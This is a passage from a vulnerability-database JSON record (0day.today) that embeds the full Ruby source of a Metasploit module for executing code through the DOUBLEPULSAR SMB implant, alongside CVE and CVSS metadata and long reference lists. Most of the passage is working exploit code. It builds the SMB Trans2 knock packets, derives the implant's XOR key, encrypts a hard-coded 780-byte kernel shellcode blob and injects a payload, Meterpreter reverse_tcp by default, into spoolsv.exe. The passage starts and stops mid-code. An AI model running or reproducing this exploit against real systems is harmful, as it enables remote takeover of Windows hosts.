simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-07] #"}, "lastseen": "2021-09-07T06:15:22", "differentElements": ["sourceData"], "edition": 9}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "f62cb47adf0cd6fc99fb5f3d473b23e7", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-07T22:13:30", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": 
["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27803"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "exploitdb", "idList": ["EDB-ID:42031", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96706", "SMNTC-96703", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-07T22:13:30", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-07T22:13:30", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => 
true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
